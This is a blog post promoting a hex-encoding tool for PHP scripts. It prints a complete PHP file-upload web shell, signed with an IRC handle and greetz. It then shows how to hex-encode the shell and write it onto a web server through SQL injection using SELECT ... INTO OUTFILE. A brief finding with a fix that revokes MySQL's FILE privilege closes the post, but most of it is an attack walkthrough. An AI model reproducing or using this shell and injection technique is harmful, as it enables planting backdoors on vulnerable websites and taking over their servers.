Linux PHP and Website Security ProjectX

Script Hex Dump – Forensic Tool

SHD

This java based application helps you parse contents of your script e.g. PHP scripts and automatically convert it as hex value, some pentesters use this method to test for possible sql injection vulnerability in a website. As we all know SQL Injection attack has been in the wild for so many years now especially those website running PHP and MySQL as the backend database server, one of its capability if the server is not properly configure is the command for writing arbitrary files.

Using this tool for example if I have this php upload shell

<html>
<p>impeldown@irc.dal.net</p>
<p>Greetz to: www.theprojectxblog.net</p>
<form enctype=”multipart/form-data” action=”uploader.php” method=”POST”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”1000000″ />
Choose a file to upload: <input name=”uploadedfile” type=”file” /><br />
<input type =”submit” value=”Upload File” />
</form>
</html>

<?php
$target_path= “”;
$target_path = $target_path . basename($_FILES[‘uploadedfile’][‘name’]);
if(isset($_FILES[‘uploadedfile’][‘name’])) {
if(move_uploaded_file($_FILES[‘uploadedfile’][‘tmp_name’], $target_path)) {
echo “The file ” . basename($_FILES[‘uploadedfile’][‘name’]) . ” has been uploaded”;
}else {
echo “There was an error uploading the file, please try again!”;
}
}
?>

Select your script, copy the generated hex value; and paste your sql code from a vulnerable website

eg. SELECT 0x3C68746D6C3E203C703E696D70656C646F776E4069… INTO OUTFILE ‘/var/www/htdocs/u2.php’

It will look something like this if the sql injection code works.

PHPBackdoorSeverity: Medium

Description:

The FILE privilege allows a user to create files on the operating system using the SELECT [value] INTO OUTFILE statement. Files will be created under the context of the MySQL database. These privilege can be used to manipulate to take control of the MySQL database and possible the system.

Solution:

To prevent users from reading from or writing to the file system, you should revoke the FILE privilege.

shell> mysql -u root [password]

mysql> REVOKE FILE ON *.* FROM [username];

FLUSH PRIVILEGES;

 

Download the tool here

Leave a Reply